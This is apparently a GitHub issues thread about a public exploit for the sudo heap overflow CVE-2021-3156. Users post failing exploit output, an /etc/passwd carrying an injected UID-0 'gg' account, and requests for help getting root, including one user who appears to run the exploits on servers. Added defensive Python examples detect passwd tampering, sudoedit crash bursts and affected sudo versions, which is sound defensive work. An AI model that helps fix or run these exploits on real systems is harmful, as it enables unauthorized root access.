worawit / cve-2021-3156
Sudo Baron Samedit Exploit
License: BSD 3-Clause "New" or "Revised" License
Hi @worawit
does this mean that this configuration is not usable or needs some work?
End output:
offset to defaults: 0x60
sudoedit: option `mail_always' does not take a value
sudoedit: you are not permitted to use the -C option
invalid offset. exit code: 256
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
$ uname -r
4.9.75-25.55.amzn1.x86_64
$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Hi worawit,
sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
uname -a
Linux ubuntu 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Exploit Used : exploit_timestamp_race.c
After running the exploit, a modification was made to the /etc/passwd file adding the (gg) user, but I can't use (sudo gg) or (su gg).
user@ubuntu:~$ su gg
su: Cannot determine your user name.
user@ubuntu:~$ sudo gg
sudo: unknown uid 1000: who are you?
This is the content of /etc/passwd after running the exploit:
user@ubuntu:~$ cat /etc/passwd
root[... binary heap garbage, rendered as ▒ by the terminal; not reproduced ...]x86_64sudoedit-A-sAAAA[... long run of 'A' ...]\1234567AAAA[... run of 'A' ...]1234567\./././.[... long run of './' ...]e
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
LC_MESSAGES=C.UTF-8@AAAA[... long run of 'A' ...]LANG=CTZ=:AAAA[... several further lines consisting only of 'A' padding ...]
Thanks.
Any help would be appreciated.
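What the pasted /etc/passwd shows is the failure mode of the userspec exploit: the heap overwrite spilled binary garbage into the file ahead of the injected gg entry, so libc's passwd parser can no longer resolve uid 1000 (hence "sudo: unknown uid 1000") or the gg name. From a defender's side the two artefacts worth alerting on are a second UID-0 entry and a password hash stored directly in /etc/passwd rather than /etc/shadow. The following is an added example, not code from the worawit repository, that validates passwd-format text and reports both, along with malformed or non-printable lines. The sample file is constructed and its hash is a placeholder; the login-name pattern is the one most useradd implementations accept.

```python
import re

# Login names as accepted by useradd on most Linux systems: a letter or underscore,
# then letters, digits, underscores or hyphens, optionally ending in '$' (Samba machine accounts).
NAME_RE = re.compile(r"^[a-z_][a-z0-9_-]*\$?$")

# Values that are legitimate in the passwd password field when hashes live in /etc/shadow.
SHADOWED_PW = {"x", "*", ""}


def check_passwd(text):
    """Validate passwd-format text line by line.
    Returns a list of (line_number, finding_code) tuples; an empty list means clean."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line:
            continue
        # A heap-corruption write into the file shows up as non-ASCII or control bytes.
        if not line.isascii() or not line.isprintable():
            findings.append((n, "BINARY"))
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, "FIELDS"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if not NAME_RE.match(name):
            findings.append((n, "BAD_NAME"))
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((n, "BAD_ID"))
            continue
        if uid == "0" and name != "root":
            findings.append((n, "EXTRA_UID0"))
        if pw not in SHADOWED_PW and not pw.startswith("!"):
            findings.append((n, "HASH_IN_PASSWD"))
    return findings


def uid0_accounts(text):
    """Names of all well-formed entries carrying UID 0 (root should be the only one)."""
    names = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0" and line.isascii() and line.isprintable():
            names.append(fields[0])
    return names


# Constructed sample: a normal passwd file, then a line of heap garbage like the
# one in the post above, then an injected UID-0 account with an in-file hash.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "user:x:1000:1000:user:/home/user:/bin/bash\n"
    "root\u2592\u2592g\u2592BP1\u2592ErUiq/\u2592L/\n"
    "gg:$5$a$CONSTRUCTED_HASH_PLACEHOLDER:0:0:gg:/root:/bin/bash\n"
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
)

if __name__ == "__main__":
    for line_no, code in check_passwd(SAMPLE_PASSWD):
        print("line %d: %s" % (line_no, code))
    print("UID 0 accounts:", uid0_accounts(SAMPLE_PASSWD))
```

Run it against a real file with `check_passwd(open("/etc/passwd").read())`; on a clean host it returns an empty list and `uid0_accounts` returns `["root"]`, which makes both calls easy to wire into a periodic integrity check.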
Hi @worawit
I made a Python 3 version of exploit_userspec.py via a Python 2 to 3 converter and tried to use it.
I get the error "Cannot find cmnd size".
does this mean that this configuration is not usable or needs some work?
Traceback (most recent call last):
File "exploit_userspec3.py", line 737, in <module>
main()
File "exploit_userspec3.py", line 653, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec3.py", line 174, in find_cmnd_size
assert found, "Cannot find cmnd size"
AssertionError: Cannot find cmnd size
$ sudo --version
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16
$ uname -r
4.4.0-amd64
$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu10) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Hi @worawit
Is exploitation possible on Debian 8?
$ sudo --version
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
$ uname -r
3.16.0-4-amd64
$ sudoedit -s '01234567890123456789'
*** Error in `sudoedit': malloc(): memory corruption: 0x00005637fc4a7ea0 ***
Aborted
I tried the following exploits: () () ()
$ python exploit_nss_u14.py
Segmentation fault
$ python exploit_nss_u16.py
Segmentation fault
$ python exploit_nss_d9.py
Segmentation fault
$ python exploit_userspec.py
curr size: 0x1600
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005634c93fcbd0 ***
curr size: 0x1b00
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055bbd93f80d0 ***
curr size: 0x1d80
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055a8debe8350 ***
curr size: 0x1ec0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x0000562e47bd3490 ***
curr size: 0x1f60
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x0000561a4e9e9530 ***
curr size: 0x1fb0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005564bab37580 ***
curr size: 0x1fd0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055bcb07335a0 ***
curr size: 0x1fe0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055fd181b45b0 ***
curr size: 0x1ff0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005587a03975c0 ***
has 2 holes. very big one is bad
curr size: 0xc00
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005651a540e1e0 ***
curr size: 0x1000
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055f198e1f5e0 ***
curr size: 0x1400
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x0000563b20a3d9e0 ***
curr size: 0x1800
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055b4f44c6de0 ***
curr size: 0x1c00
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055d6e1c371e0 ***
Traceback (most recent call last):
File "exploit_userspec.py", line 736, in
main()
File "exploit_userspec.py", line 652, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec.py", line 173, in find_cmnd_size
assert found, "Cannot find cmnd size"
AssertionError: Cannot find cmnd size
Any help would be appreciated!
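The find_cmnd_size loop in the output above crashes sudoedit once per candidate size (the "exit code" printed is a wait status: 6 is SIGABRT from glibc's malloc check, 11 is SIGSEGV, 256 is a plain exit status of 1), so one exploitation attempt leaves a burst of sudoedit crashes on the host. The malloc abort messages go only to the process's stderr, but the SIGSEGV ones are reported by the kernel and land in dmesg/syslog. Below is an added detection example, not part of the worawit repository, that pulls sudo/sudoedit segfault lines out of syslog-format text and flags hosts with a burst of them inside a short window. The log lines and host names are constructed to follow the x86-64 kernel segfault report format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Kernel segfault report as it appears in syslog on x86-64, e.g.
#   Feb  2 10:15:01 host kernel: [ 8123.440120] sudoedit[4101]: segfault at 0 ip ... sp ... error 4 in libc-2.19.so[...]
SEGFAULT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) kernel: (?:\[\s*[\d.]+\] )?"
    r"(?P<prog>sudo|sudoedit)\[(?P<pid>\d+)\]: segfault at (?P<addr>\S+) ip (?P<ip>\S+)"
)


def parse_ts(text):
    """Syslog timestamps carry no year; strptime leaves it at 1900, which is fine for windowing."""
    return datetime.strptime(text, "%b %d %H:%M:%S")


def sudo_crashes(log_text):
    """Return (timestamp, host, program, pid, fault_address) for every sudo/sudoedit segfault line."""
    events = []
    for line in log_text.splitlines():
        m = SEGFAULT_RE.match(line)
        if m:
            events.append((parse_ts(m.group("ts")), m.group("host"), m.group("prog"),
                           int(m.group("pid")), m.group("addr")))
    return events


def flag_bursts(events, threshold=3, window=timedelta(minutes=5)):
    """Per host, find the largest number of crashes inside any `window` (sliding over
    sorted timestamps) and return {host: count} for hosts reaching `threshold`."""
    by_host = defaultdict(list)
    for ts, host, *_ in events:
        by_host[host].append(ts)
    flagged = {}
    for host, times in by_host.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[host] = best
    return flagged


# Constructed sample: four sudoedit crashes within seconds on one host (the pattern a
# size-search loop produces), an unrelated bash crash, and a lone crash on another host.
SAMPLE_LOG = "\n".join([
    "Feb  2 10:15:01 debian8 kernel: [ 8123.440120] sudoedit[4101]: segfault at 0 ip 00007f3c1a2b4c10 sp 00007ffd2e0f3c40 error 4 in libc-2.19.so[7f3c1a230000+1a1000]",
    "Feb  2 10:15:02 debian8 kernel: [ 8124.101220] sudoedit[4105]: segfault at 8 ip 00007f3c1a2b4c10 sp 00007ffd2e0f3c40 error 4 in libc-2.19.so[7f3c1a230000+1a1000]",
    "Feb  2 10:15:02 debian8 kernel: [ 8124.553003] sudoedit[4109]: segfault at 0 ip 00007f3c1a2b4c10 sp 00007ffd2e0f3c40 error 4 in libc-2.19.so[7f3c1a230000+1a1000]",
    "Feb  2 10:15:03 debian8 kernel: [ 8125.002311] bash[4112]: segfault at 10 ip 000055d1c0a0b1f0 sp 00007ffd2e0f3c40 error 6 in bash[55d1c09f0000+f0000]",
    "Feb  2 10:15:04 debian8 kernel: [ 8126.223400] sudoedit[4115]: segfault at 0 ip 00007f3c1a2b4c10 sp 00007ffd2e0f3c40 error 4 in libc-2.19.so[7f3c1a230000+1a1000]",
    "Feb  2 11:40:17 web01 kernel: [ 9001.000000] sudoedit[7777]: segfault at 0 ip 00007f3c1a2b4c10 sp 00007ffd2e0f3c40 error 4 in libc-2.19.so[7f3c1a230000+1a1000]",
])

if __name__ == "__main__":
    events = sudo_crashes(SAMPLE_LOG)
    print("%d sudo/sudoedit segfaults" % len(events))
    print("bursting hosts:", flag_bursts(events))
```

A single sudoedit crash can be a genuine bug; several within a minute from a setuid binary that almost never crashes in normal use is the signal worth paging on, which is why the threshold is applied per host over a sliding window rather than to the raw count.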
Excuse me, I have learned a lot from your exploit methods. And I found that the user needs to be in /etc/sudoers when I use exploit_userspec.py; if the user is not in /etc/sudoers, is it possible to exploit?
python exploit_cent7_userspec.py
Traceback (most recent call last):
File "exploit_cent7_userspec.py", line 50, in
resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))
ValueError: not allowed to raise maximum limit
Can anyone help?
Is exploitation possible on Debian GNU/Linux 9.5 (stretch)?
Sudo version : 1.8.19p1
Kernel : Linux localhost 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u6 (2018-10-08) x86_64 GNU/Linux
I tried all the exploits; none of them worked!
Any help would be appreciated!
Hi, worawit.
I've learned a lot about heap overflow from your project. But I have a new error during my VM testing: the size parameter of the cmnd function cannot be obtained accurately all the time.
Here is the error message:
[test@localhost tmp]$ python exploit_userspec.py
curr size: 0x1600
exit code: 11
curr size: 0x1100
exit code: 11
curr size: 0xe80
exit code: 11
curr size: 0xd40
exit code: 11
curr size: 0xca0
exit code: 11
curr size: 0xc50
exit code: 11
curr size: 0xc20
exit code: 11
curr size: 0xc10
exit code: 11
Traceback (most recent call last):
File "exploit_userspec.py", line 736, in <module>
main()
File "exploit_userspec.py", line 652, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec.py", line 154, in find_cmnd_size
assert size_min == 0x2000 - 0x10
AssertionError
And here is the version info:
[test@localhost tmp]$ sudo -V
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
[test@localhost tmp]$ hostnamectl
Static hostname: localhost
Icon name: computer-vm
Chassis: vm
Machine ID: 71a7851c7f64482cad825974248cc902
Boot ID: d6b64d7f01684b8ca51f807d08079a03
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-957.21.3.el7.x86_64
[test@localhost tmp]$ python -V
Python 2.7.5
[test@localhost tmp]$ sysctl -a --pattern randomiz
kernel.randomize_va_space = 2
[test@localhost tmp]$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Also, I tried manually getting specific parameter values and specifying specific inputs (some Python code I've changed with local debugging):
exploit_userspec.py 0x2000 0
exploit_defaults_mailer.py 0x2000 0
The error still exists:
Traceback (most recent call last):
File "exploit_userspec.py", line 736, in <module>
main()
File "exploit_userspec.py", line 652, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec.py", line 154, in find_cmnd_size
assert size_min == 0x2000 - 0x10
AssertionError
Is exploitation possible on Debian 7.11 (x86_64), sudo version 1.8.5p2?
Kernel: 3.10.0
ldd version: 2.13-38+deb7u12
The PoCs lead to a segfault and the last-resort timestamp race is not effective.
Any help would be appreciated!
Hi,
I was wondering if you have looked into exploitation strategies for systems based on Debian 10 cloud images, such as OpenStack. Many cloud providers use these images to deploy Debian instead of the standard downloads.
On these systems, the nscd service is running by default, so I'm unable to use any of the nss-based exploits. However, exploit_timestamp_race doesn't seem to work either; the exploit fails with this message, and the gg user is nonexistent:
...[truncated]
sudoedit: ././././././././././././a: command not found
Failed. can cleanup
sudoedit: ././././././././././././a: command not found
Failed. can cleanup
su: user gg does not exist
now can use "su - gg" with 'gg' password to become root
The version of glibc seems new enough that it's not tcache related, but I could be wrong. Here is some information about the system in question. I also created a VirtualBox VM here if you ever want to play around with the cloud image I'm testing on.
$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
$ uname -a
Linux debian10 4.19.0-14-cloud-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
$ apt policy sudo
sudo:
Installed: 1.8.27-1+deb10u2
Candidate: 1.8.27-1+deb10u3
Version table:
1.8.27-1+deb10u3 500
500 http://deb.debian.org/debian buster/main amd64 Packages
500 http://security.debian.org/debian-security buster/updates/main amd64 Packages
*** 1.8.27-1+deb10u2 100
100 /var/lib/dpkg/status
$ apt policy libc6
libc6:
Installed: 2.28-10
Candidate: 2.28-10
Version table:
*** 2.28-10 500
500 http://deb.debian.org/debian buster/main amd64 Packages
100 /var/lib/dpkg/status
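The version strings pasted throughout this thread (1.8.6p3, 1.8.16, 1.8.21p2, 1.8.23, 1.8.27) all fall inside the upstream ranges the sudo advisory lists as affected by CVE-2021-3156: 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1. The apt output above also illustrates the caveat: distributions backport the fix into a package whose name keeps the old upstream version, so a version-range check is only a first filter and the package changelog, or the advisory's non-destructive probe `sudoedit -s /` (a patched sudo answers with a message starting "usage:", an unpatched one with an error starting "sudoedit:"), settles it. Below is an added example, not code from the worawit repository, that parses `sudo -V` output, classifies the upstream version against those ranges and classifies the probe's stderr; the sample output is constructed after the ones quoted in this thread.

```python
import re

# Upstream sudo versions affected by CVE-2021-3156, as published in the sudo
# advisory: legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1.
# Versions are compared as (major, minor, patch, p-level) tuples.
VULNERABLE_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# Accepts "1.8.31p2", "1.9.5" and distro-suffixed forms such as "1.8.27-1+deb10u2";
# the distro suffix is deliberately ignored because it says nothing about backports.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """Turn a sudo version string into a comparable (major, minor, patch, plevel) tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised sudo version string: %r" % text)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_from_sudo_v(output):
    """Extract the sudo front-end version from `sudo -V` output."""
    for line in output.splitlines():
        if line.startswith("Sudo version "):
            return parse_sudo_version(line[len("Sudo version "):])
    raise ValueError("no 'Sudo version' line in output")


def upstream_in_affected_range(version):
    """True if the upstream version lies inside a range the advisory lists as affected."""
    return any(lo <= version <= hi for lo, hi in VULNERABLE_RANGES)


def classify_probe_output(stderr_text):
    """Classify the stderr of the advisory's `sudoedit -s /` probe: a patched sudo
    rejects the flag combination with a 'usage:' line, an unpatched one accepts it
    and fails later with a 'sudoedit:' error."""
    first = stderr_text.lstrip().split("\n", 1)[0]
    if first.startswith("usage:"):
        return "patched"
    if first.startswith("sudoedit:"):
        return "vulnerable"
    return "unknown"


def assess(sudo_v_output):
    """Turn `sudo -V` output into a one-line verdict that states its own limits."""
    v = version_from_sudo_v(sudo_v_output)
    label = "%d.%d.%d" % v[:3] + ("p%d" % v[3] if v[3] else "")
    if not upstream_in_affected_range(v):
        return "sudo %s: outside the affected upstream ranges" % label
    return ("sudo %s: inside an affected upstream range; confirm with the package "
            "changelog or the `sudoedit -s /` probe, since distros backport the fix" % label)


# Constructed sample, modelled on the `sudo -V` output quoted in this thread.
SAMPLE_SUDO_V = """\
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
"""

if __name__ == "__main__":
    print(assess(SAMPLE_SUDO_V))
    print(classify_probe_output("usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..."))
```

On a fleet, the cheap first pass is `assess()` over collected `sudo -V` output; only hosts it flags need the changelog lookup or the probe, and the probe is safe to run because it never reaches the vulnerable parsing path with an overlong argument.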
Hello Sleepya,
I've been using your successful exploits for a long time and I noticed that on some servers the created account "gg" is blocked after the exploit is run successfully using exploit_userspec.py.
When I execute su gg, I get this message:
su gg
Password: gg
Account locked due to 5835 failed logins
su: Authentication failure
I think if we have the ability to make an old passwd file by changing the current user info inside the passwd file and then replace it, this problem will be solved, since we will not need to execute the su command because we are already inside the account. I tried to do so, but I could not find something like an old passwd file in exploit_userspec.py.
Thank you
My system version is CentOS 7.9 and the sudo version is 1.8.23.
Is CentOS not able to use the vulnerability?
In the exploit code exploit_nss_u14.py or exploit_nss_u16.py, you wrote "the glibc with tcache" in the beginning comment. However, in the README.md, you wrote "For Linux distribution that glibc has no tcache support". Which one is a typo? By the way, can you tell me the glibc version that you tested on Ubuntu 14.04 and 16.04? Thanks for your sharing.
#!/usr/bin/python
'''
Exploit for CVE-2021-3156 on Ubuntu 16.04 by sleepya
This exploit requires:
- glibc with tcache
For Linux distribution that glibc has no tcache support:
if a target is Debian 9, Ubuntu 16.04, or Ubuntu 14.04, try exploit_nss_xxx.py for specific version first
Hi! I want to make exploit code for a 32-bit environment.
There have been various attempts, but the most fundamental problem is that there is only one space (unsorted bin) in the bins just before the overflow buffer is allocated.
Is there any way to increase this? (I want to use small bins, fast bins... but only unsorted bins always remain.)
Hi @worawit
Use exploit: exploit_defaults_mailer.py
does this mean that this configuration is not usable or needs some work?
End output:
cmnd size: 0x1150
offset to defaults: 0x0
sudoedit: option `mail_always' does not take a value
sudoedit: you are not permitted to use the -C option
invalid offset. exit code: 256
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
$ uname -r
2.6.32-696.16.1.el6.x86_64
$ ldd --version
ldd (GNU libc) 2.12
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Line 187 of exploit_nss.py:
proc = subprocess.Popen(['ip', 'addr'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
Generally, ip addr cannot be run directly as a low-privilege user. It can be changed to /sbin/ip, i.e. ['/sbin/ip', 'addr'].
Hi @worawit
I tried the exploit code exploit_defaults_mailer.py on CentOS 6.10 and got the following error messages.
Cannot determine disble-root-mailer flag
curr size: 0x1600
exit code: 11
curr size: 0x1100
*** glibc detected *** sudoedit: malloc(): memory corruption: 0x00005654d9e3d630 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x39ff475e5e)[0x2b2a32c83e5e]
/lib64/libc.so.6(+0x39ff47a41a)[0x2b2a32c8841a]
/lib64/libc.so.6(__libc_malloc+0x5c)[0x2b2a32c88b1c]
/usr/libexec/sudoers.so(+0x2f558)[0x2b2a331e2558]
/usr/libexec/sudoers.so(+0x29e52)[0x2b2a331dce52]
/usr/libexec/sudoers.so(+0x10d9d)[0x2b2a331c3d9d]
/usr/libexec/sudoers.so(+0xffda)[0x2b2a331c2fda]
/usr/libexec/sudoers.so(+0x124b0)[0x2b2a331c54b0]
/usr/libexec/sudoers.so(+0x13b4e)[0x2b2a331c6b4e]
sudoedit(+0xe8fc)[0x5654d966a8fc]
/lib64/libc.so.6(__libc_start_main+0x100)[0x2b2a32c2cd20]
sudoedit(+0x3ef9)[0x5654d965fef9]
======= Memory map: ========
2b2a321a0000-2b2a321c0000 r-xp 00000000 08:02 139429 /lib64/ld-2.12.so
2b2a321c0000-2b2a321c1000 rw-p 00000000 00:00 0
2b2a323c0000-2b2a323c1000 r--p 00020000 08:02 139429 /lib64/ld-2.12.so
2b2a323c1000-2b2a323c2000 rw-p 00021000 08:02 139429 /lib64/ld-2.12.so
2b2a323c2000-2b2a323c3000 rw-p 00000000 00:00 0
2b2a323c3000-2b2a323db000 r-xp 00000000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a323db000-2b2a325da000 ---p 00018000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a325da000-2b2a325dc000 r--p 00017000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a325dc000-2b2a325e7000 rw-p 00019000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a325e7000-2b2a32604000 r-xp 00000000 08:02 139436 /lib64/libselinux.so.1
2b2a32604000-2b2a32803000 ---p 0001d000 08:02 139436 /lib64/libselinux.so.1
2b2a32803000-2b2a32804000 r--p 0001c000 08:02 139436 /lib64/libselinux.so.1
2b2a32804000-2b2a32805000 rw-p 0001d000 08:02 139436 /lib64/libselinux.so.1
2b2a32805000-2b2a32807000 rw-p 00000000 00:00 0
2b2a32807000-2b2a32809000 r-xp 00000000 08:02 130443 /lib64/libutil-2.12.so
2b2a32809000-2b2a32a08000 ---p 00002000 08:02 130443 /lib64/libutil-2.12.so
2b2a32a08000-2b2a32a09000 r--p 00001000 08:02 130443 /lib64/libutil-2.12.so
2b2a32a09000-2b2a32a0a000 rw-p 00002000 08:02 130443 /lib64/libutil-2.12.so
2b2a32a0a000-2b2a32a0c000 r-xp 00000000 08:02 139435 /lib64/libdl-2.12.so
2b2a32a0c000-2b2a32c0c000 ---p 00002000 08:02 139435 /lib64/libdl-2.12.so
2b2a32c0c000-2b2a32c0d000 r--p 00002000 08:02 139435 /lib64/libdl-2.12.so
2b2a32c0d000-2b2a32c0e000 rw-p 00003000 08:02 139435 /lib64/libdl-2.12.so
2b2a32c0e000-2b2a32d99000 r-xp 00000000 08:02 139430 /lib64/libc-2.12.so
2b2a32d99000-2b2a32f98000 ---p 0018b000 08:02 139430 /lib64/libc-2.12.so
2b2a32f98000-2b2a32f9c000 r--p 0018a000 08:02 139430 /lib64/libc-2.12.so
2b2a32f9c000-2b2a32f9e000 rw-p 0018e000 08:02 139430 /lib64/libc-2.12.so
2b2a32f9e000-2b2a32fa5000 rw-p 00000000 00:00 0
2b2a32fa5000-2b2a32fb2000 r-xp 00000000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a32fb2000-2b2a331b1000 ---p 0000d000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a331b1000-2b2a331b2000 r--p 0000c000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a331b2000-2b2a331b3000 rw-p 0000d000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a331b3000-2b2a331f9000 r-xp 00000000 08:02 678288 /usr/libexec/sudoers.so
2b2a331f9000-2b2a333f8000 ---p 00046000 08:02 678288 /usr/libexec/sudoers.so
2b2a333f8000-2b2a333f9000 r--p 00045000 08:02 678288 /usr/libexec/sudoers.so
2b2a333f9000-2b2a333fb000 rw-p 00046000 08:02 678288 /usr/libexec/sudoers.so
2b2a333fb000-2b2a33401000 rw-p 00000000 00:00 0
2b2a3340d000-2b2a33419000 r-xp 00000000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a33419000-2b2a33619000 ---p 0000c000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a33619000-2b2a3361a000 r--p 0000c000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a3361a000-2b2a3361b000 rw-p 0000d000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a3361b000-2b2a33669000 r-xp 00000000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a33669000-2b2a33868000 ---p 0004e000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a33868000-2b2a3386a000 r--p 0004d000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a3386a000-2b2a3386c000 rw-p 0004f000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a3386c000-2b2a33881000 r-xp 00000000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33881000-2b2a33a80000 ---p 00015000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33a80000-2b2a33a81000 r--p 00014000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33a81000-2b2a33a82000 rw-p 00015000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33a82000-2b2a33a89000 r-xp 00000000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33a89000-2b2a33c89000 ---p 00007000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33c89000-2b2a33c8a000 r--p 00007000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33c8a000-2b2a33c8b000 rw-p 00008000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33c8b000-2b2a33cb9000 rw-p 00000000 00:00 0
2b2a33cb9000-2b2a33cc7000 r-xp 00000000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33cc7000-2b2a33ec6000 ---p 0000e000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33ec6000-2b2a33ec7000 r--p 0000d000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33ec7000-2b2a33ec8000 rw-p 0000e000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33ec8000-2b2a33ede000 r-xp 00000000 08:02 139451 /lib64/libresolv-2.12.so
2b2a33ede000-2b2a340de000 ---p 00016000 08:02 139451 /lib64/libresolv-2.12.so
2b2a340de000-2b2a340df000 r--p 00016000 08:02 139451 /lib64/libresolv-2.12.so
2b2a340df000-2b2a340e0000 rw-p 00017000 08:02 139451 /lib64/libresolv-2.12.so
2b2a340e0000-2b2a340e2000 rw-p 00000000 00:00 0
2b2a340e2000-2b2a340fb000 r-xp 00000000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a340fb000-2b2a342fa000 ---p 00019000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a342fa000-2b2a342fb000 r--p 00018000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a342fb000-2b2a342fc000 rw-p 00019000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a342fc000-2b2a34350000 r-xp 00000000 08:02 683482 /usr/lib64/libssl3.so
2b2a34350000-2b2a3454f000 ---p 00054000 08:02 683482 /usr/lib64/libssl3.so
exit code: 6
curr size: 0x1380
exit code: 11
